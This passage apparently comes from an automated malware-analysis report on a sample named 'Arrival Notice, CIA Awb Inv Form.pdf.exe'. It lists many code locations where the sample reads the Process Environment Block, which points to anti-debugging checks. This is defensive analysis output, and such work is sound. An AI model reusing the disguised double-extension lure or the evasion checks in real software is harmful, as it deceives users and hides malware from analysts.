    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA30F16 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA30F16 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAAEF66 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4F7C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AF72 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA46F70 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EEF79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EEF79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EEF79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAABF4D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EBF70 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F1F70 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAAAF50 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F7C95 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F7C95 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7C85 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7C85 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7C85 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7C85 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7C85 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA73C80 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA99C98 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA99C98 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA99C98 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA99C98 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAAFC95 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA87CE8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA70CEE mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1ECF3 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1ECF3 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FFCC9 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6CCF0 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E6CC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E6CC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E6CC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA26CC0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA29CCF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E7CF1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F3CF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F3CF0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0DCD1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0DCD1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0DCD1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2CCD1 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2CCD1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2CCD1 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA75CD0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA83CD4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA83CD4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA83CD4 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA83CD4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA83CD4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA18CDF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA18CDF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4CD2 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0AC20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0AC20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0AC20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA87C38 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB5C38 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB5C38 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA24C3D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E8C3D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA22C10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA22C10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA22C10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA22C10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BC6E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BC6E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EDC40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA03C40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F0C79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F0C79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F0C79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F8C79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F8C79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F8C79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F8C79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F8C79 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA73C57 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4C59 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9ECC68 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4DA7 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F6D91 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9ECD8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9ECD8A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA22DBC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA22DBC mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F7DB6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EDDB0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E6DA6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABCDEB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EABCDEB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1FDE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E8DCD mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EEDFA mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAAADD6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAAADD6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AD20 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0D24 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0D24 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0D24 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAA0D24 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA10D01 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAABD08 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAABD08 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA88D0A mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1CD10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA1CD10 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9EFD20 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA05D60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA75D60 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC5D65 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F1D50 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F1D50 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA96D79 mov esi, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BD71 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2BD71 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E9D46 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E9D46 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9E9D46 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6CD40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6CD40 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAC4D4B mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB5D43 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB5D43 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0DD4D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0DD4D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA0DD4D mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA71D5E mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAADAAF mov eax, dword ptr fs:[00000030h]
